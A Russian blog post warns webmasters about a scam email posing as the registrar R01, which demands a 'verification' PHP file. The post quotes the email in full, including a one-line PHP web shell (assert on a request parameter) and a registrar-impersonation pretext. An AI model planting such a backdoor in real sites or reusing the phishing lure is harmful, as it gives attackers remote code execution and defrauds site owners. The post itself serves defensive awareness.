Большинство веб-мастеров вполне законопослушные люди, чем уже не раз пользовались мошенники. Буквально на днях и меня хотели «купить» на мякине, прислав письмо, типа, от R01, в котором просили подтвердить, «что фактическое управление доменным именем zegeberg.ru осуществляется лицом, указанным в качестве его администратора». Ниже приведён полный текст мошеннической рассылки.
Текст письма
Уважаемый клиент! В соответствии с дополнениями, внесенными в регламент ICANN, Вы должны подтвердить, что фактическое управление доменным именем zegeberg.ru осуществляется лицом, указанным в качестве его администратора.
Чтобы подтвердить, что Вы имеете фактическую возможность управлять доменным именем, создайте в корневой директории сайта файл a1nqcmh82cqh2drd.php со следующим содержимым:
<?php assert(stripslashes($_REQUEST[R01])); ?>
Файл должен быть создан в течение трех календарных дней с момента получения настоящего письма и находиться на сервере до 17 июня 2017 года, 13:00 (UTC+03:00), в противном случае процедура верификации не будет пройдена.
Обращаем Ваше внимание на то, что если процедура подтверждения не будет пройдена, делегирование домена будет приостановлено. Отправитель R01.RU no-replyСобака01.ru
Мысли мои сразу дёрнулись, потом застыли и дали ход назад. Алгоритм извилин был такой:
- Что-то новое с регистрацией доменов,
- Может вставить?
- Да ну нафиг (приходит отрезвление),
- Да пошли они (полная трезвость).
Что делать
Правильными оказались пункты 4 и 5. Запомните, а лучше запишите на стене возле рабочего компьютера:
Никто не имеет права требовать размещения на вашем сайте стороннего кода!
Ни регистратор, ни хостер не имеют этого права!
В некоторых случаях, например, при подтверждении прав на сайт в панели веб-мастера Яндекс и Google вам могут предложить варианты, среди которых и временное размещение кода, но требовать не может никто.
Через такой код на сайт размещается шелл, через который можно лить, что душе угодно. Левые ссылки, скрытый текст, всплывающая реклама – да всё, что угодно.
Ни в коем случае не размещайте на сайте никакой код с почтовой рассылки, иначе потом запаритесь платить за очистку сайта и вытягивать его из бана. Также учтите:
Текст рассылки мошенников может меняться, суть одна – вас просят разместить на сайте некий код.
Подача может идти под любым соусом, вам могут давать ссылки на некие законодательные акты и прочую хрень (мошенники не дураки). Они не напишут словами Паниковского:
«Положите во дворе под мусорный ящик шестьсот рублей, иначе будет плохо».
Короче, надеюсь, вы меня услышали – никакого кода, под каким бы соусом он не был подан.